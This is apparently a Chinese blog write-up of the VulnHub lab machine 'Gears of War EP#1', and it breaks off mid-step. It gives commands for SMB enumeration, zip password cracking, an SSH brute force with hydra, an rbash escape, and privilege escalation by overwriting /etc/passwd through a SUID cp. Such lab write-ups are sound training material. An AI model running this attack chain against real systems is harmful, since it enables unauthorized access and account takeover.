目录

• 介绍
• 信息收集
• • 主机发现
  • 主机信息探测
  • 访问网站
• 测试 samba 安全
• • smbmap 访问默认共享
  • enum4linux 获取系统用户
  • smbclient获取文件
  • 查看文件
• SSH爆破
• 登录SSH
• • 绕过rbash
  • 提权
  • 查看flag
• 参考

介绍

系列：Gears of War（此系列仅此一台）
发布日期： 2019年10月17日
难度： 初级
Flag : 不详
学习：SMB攻击
靶机地址：https://www.vulnhub.com/entry/gears-of-war-ep1,382/
涉及到的相关工具，参见之前的文章：HACKNOS: OS-BYTESEC

信息收集

主机发现

netdiscover主机发现
对于VulnHub靶机来说，出现“PCS Systemtechnik GmbH”就是靶机。

主机信息探测

信息探测：nmap -A -p- 192.168.124.10，开放了22、80、139、445端口，445的信息过多，靶机的重点是在445上。

访问网站

会注意到网站上面有一个按钮，点击之后依然是一个静态页面，没啥玩的。

测试 samba 安全

smbmap 访问默认共享

smbmap -H 192.168.124.10，发现LOCUS_LAN$有读取权限

递归读取LOCUS_LAN$文件夹：smbmap -H 192.168.124.10 -R LOCUS_LAN$

enum4linux 获取系统用户

使用命令：enum4linux 192.168.124.10 -R | grep Local
枚举出三个用户：marcus、root、nobody

smbclient获取文件

使用空密码连接靶机的共享文件夹，使用get命令下载文件

查看文件

压缩包需要密码才能打开，txt给了一些提示，猜测是@%%,的某一种排列组合才能打开数据包

1. 生成字典：crunch 4 4 -t @%%, > list.txt
2. 爆破压缩包
   1. 安装工具：sudo apt-get install fcrackzip
   2. 爆破：fcrackzip -D -u -p list.txt msg_horda.zip

翻译一下，给了我们一些字符：3_d4y。大概率就是这个靶机上的某用户的名字或者密码，由于压缩包解压之后得到的是key.txt，猜测这个应该是密码。

SSH爆破

hydra -L /usr/share/wordlists/rockyou.txt -p 3_d4y ssh://192.168.124.10

登录SSH

使用命令：ssh marcus@192.168.124.10
发现自己的家目录里面有个文件夹，但是访问它的时候被拒了，提示rbash是受限制的。

绕过rbash

指定终端：ssh marcus@192.168.124.10 -t "bash -noprofile"
进来之后，发现啥也没有

提权

家目录下没啥文件，直接提权吧。

1. 查找SUID文件：find / -type f -perm -u=s 2>/dev/null

发现了cp，剩下的简单了，替换passwd文件实现提权即可

2. 提取出靶机的passwd文件：cat /etc/passwd > passwd
3. kali通过OpenSSL passwd生成一个新的用户hacker，密码为hack123：

┌──(root
标签：文件,124.10,passwd,192.168,WAR,Vulnhub,靶机,txt,EP	

来源： https://blog.csdn.net/weixin_44288604/article/details/122641223